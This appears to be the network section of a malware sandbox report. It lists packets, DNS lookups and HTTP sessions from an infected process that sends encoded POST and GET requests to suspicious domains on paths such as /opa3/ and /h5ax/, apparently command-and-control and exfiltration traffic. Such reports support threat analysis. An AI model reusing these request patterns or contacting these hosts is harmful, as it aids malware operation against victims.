                                              Sep 24, 2024 11:29:53.089190006 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:53.223253012 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:58.098874092 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:58.413238049 CEST8049947206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:29:58.413434029 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:58.423151016 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:58.737560034 CEST8049947206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:29:58.737744093 CEST8049947206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:29:58.737977028 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:29:59.936050892 CEST4994780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:00.954696894 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:01.273042917 CEST8049948206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:01.273283005 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:01.285279036 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:01.603673935 CEST8049948206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:01.603801012 CEST8049948206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:01.603996038 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:02.794764996 CEST4994880192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:03.813306093 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.130846977 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.131043911 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.142028093 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.142046928 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:04.459712982 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.459904909 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.546061039 CEST8049949206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:04.546220064 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:05.653599977 CEST4994980192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:06.671679974 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:06.986915112 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:06.987087965 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:06.993084908 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:07.308537006 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:07.308634996 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:07.308934927 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:07.312051058 CEST4995080192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:30:07.627249002 CEST8049950206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:30:12.326884031 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.496589899 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.496731997 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.508598089 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.678319931 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689295053 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689409971 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689428091 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689439058 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689450979 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689541101 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689603090 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689655066 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689676046 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689688921 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689699888 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.689773083 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689773083 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689878941 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:12.689960957 CEST8049951209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:12.690175056 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:14.010998011 CEST4995180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.029839039 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.196926117 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.197118044 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.208142042 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.375392914 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388524055 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388540030 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388638020 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388653994 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388725042 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.388760090 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388784885 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.388916016 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388931036 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.388966084 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389122009 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:15.389137983 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389247894 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389337063 CEST8049952209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:15.389528990 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:16.713531971 CEST4995280192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.731769085 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.900293112 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:17.900501966 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.909603119 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:17.909621954 CEST4995380192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:30:18.077914953 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.077927113 CEST8049953209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:30:18.078135967 CEST8049953209.74.95.29192.168.11.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Sep 24, 2024 11:28:09.220923901 CEST1.1.1.1192.168.11.300x45f2No error (0)www.inf30027group23.xyzinf30027group23.xyzCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.220923901 CEST1.1.1.1192.168.11.300x45f2No error (0)inf30027group23.xyz221.121.144.149A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.531526089 CEST9.9.9.9192.168.11.300x45f2No error (0)www.inf30027group23.xyzinf30027group23.xyzCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.531526089 CEST9.9.9.9192.168.11.300x45f2No error (0)inf30027group23.xyz221.121.144.149A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:24.031963110 CEST1.1.1.1192.168.11.300x60baNo error (0)www.rmgltd.servicesrmgltd.servicesCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:24.031963110 CEST1.1.1.1192.168.11.300x60baNo error (0)rmgltd.services3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:24.031963110 CEST1.1.1.1192.168.11.300x60baNo error (0)rmgltd.services15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:37.848706007 CEST1.1.1.1192.168.11.300xd49eNo error (0)www.mfgarage.net85.153.138.113A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:52.144521952 CEST1.1.1.1192.168.11.300x2953No error (0)www.chalet-tofane.netchalet-tofane.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:52.144521952 CEST1.1.1.1192.168.11.300x2953No error (0)chalet-tofane.net62.149.128.40A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.925887108 CEST1.1.1.1192.168.11.300xdf5eNo error (0)www.tracy.clubtracy.clubCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.925887108 CEST1.1.1.1192.168.11.300xdf5eNo error (0)tracy.club3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.925887108 CEST1.1.1.1192.168.11.300xdf5eNo error (0)tracy.club15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:20.320343018 CEST1.1.1.1192.168.11.300x380aNo error (0)www.prj81oqde1.buzz154.212.219.2A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:35.163533926 CEST1.1.1.1192.168.11.300xca5eNo error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:29:35.163533926 CEST1.1.1.1192.168.11.300xca5eNo error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:30:53.631144047 CEST1.1.1.1192.168.11.300x7ec6Name error (3)www.useanecdotenow.technonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:31:28.887465954 CEST1.1.1.1192.168.11.300x1024Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:31:28.998990059 CEST9.9.9.9192.168.11.300x1024Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.11.30 | 49893 | 208.91.197.27 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:11.830647945 CEST | 500 | OUT | GET /4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT HTTP/1.1
                                              Host: www.brainchainllc.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:12.612413883 CEST | 850 | IN | HTTP/1.1 200 OK
                                              Date: Tue, 24 Sep 2024 09:26:11 GMT
                                              Server: Apache
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jq7WvaVVw2GzTWUtO3e1k/AlZy2zLW2ruPCVetemRPT8v48eBW20rMd118dofOTeJ2ImRdG+8A0gaar3j7dyYQ==
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.11.30 | 49894 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:28.640413046 CEST | 755 | OUT | POST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=y9Ut54SIgwt80nPmWn3cHEl8XGAPpXHxrXGpJFbVDvX8NvNqGSf/K+/AeDKcV3m1tPQiN15IJLZpfNYHfOQmZ+TXTcUugsJbHK0eBFGLNYy2LAFTOoKhFjeBngOZn2s/XysZYZ9oBkCqHpsiYZ8/dYeBN1voY7pgQR8yEdZRBNDX7HfnZFyX4NqS+tHBdVluJw==
                                              Sep 24, 2024 11:26:28.955558062 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.11.30 | 49895 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:31.509268999 CEST | 775 | OUT | POST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=y9Ut54SIgwt80G/mREfcSUl9SGAPj3H1rXKpJEvFDb78ONVqFTf/J+/AVjKFR3mutOtXN39IJL9pfPAHe5EhYuTVe8Us+cJbHK0eBG7DNY62XjdTOKiiMDee3AOZtWtXXyt8YbJWBiOqHr0iYLUwO4eDCVuMc5sRRTc7NO0JYc6r6Qu9EGGVrtW/isqpfXk1Uwtyr83p3LdT16pvv3WJ+F4=
                                              Sep 24, 2024 11:26:31.834949017 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.11.30 | 49896 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:34.359229088 CEST | 3892 | OUT | POST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:34.677422047 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.11.30 | 49897 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:37.210061073 CEST | 490 | OUT | GET /opa3/?7LY=//8N6NGdtRkn6yq8W3OBQnInDVkPrmeKzEa9OWHVIp2tO8AGOHzwJOfidi6bYHK8g9UFVHI1UtpxcaY/CfI8S9y/PcE6w9RcCLRpAW2RNdWqNgB6ObbfL00=&Nze=C0klVT HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:37.629518986 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.11.30 | 49898 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:42.938011885 CEST | 758 | OUT | POST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN1tM5z6rc7ermYnbfVnfyNQfMFuO5nSSxCegL12rj18MgeSHKazz/8cnE1iHLDTqEcege5/3EpGiKewOyti30ENzP6SLDXrjrY/0Lvdth+zUDtSy6Bdz3TbLFBHH9t4C/IwdvvCSeWXhKVr4okipFwSRNJacUhzYl2H40EGTFBPy+CiQffF934g==
                                              Sep 24, 2024 11:26:43.121496916 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:43 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.11.30 | 49899 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:45.645634890 CEST | 778 | OUT | POST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN0Nc5xZDc9+rnEXbfC3fuNRjMFsipmgGxC/QL03rj28MgQyHPHjyS8c651n/LDSOEceQe+IjD7GiMGAOwpi30ENzP6SeoXrrrEeEL9vVihDUMnyy6Fdz7TbLnBGa1t9G/IyFvhxKdfXhMRr58qygT7hpeMNsTjWc93QJuZFnHSvOTej93dH8slnFFbQiFR1fXpN6KSb/MGvQ=
                                              Sep 24, 2024 11:26:45.823584080 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:45 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.11.30 | 49900 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:48.349849939 CEST | 3895 | OUT | POST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:48.534060001 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:48 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.11.30 | 49901 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:26:51.047904015 CEST | 491 | OUT | GET /h5ax/?Nze=C0klVT&7LY=n2I933S2b2mTz9MH4ovHwta6aGzwDUSLbibwCM+kpCP4ce0V2B3v1/0mQi7obzyu6tSS6Xr/MEeQSasqmevZ/lWReC/hsjnmM5iDoTysJMz5ecITkOwwomo= HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:51.228213072 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:51 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
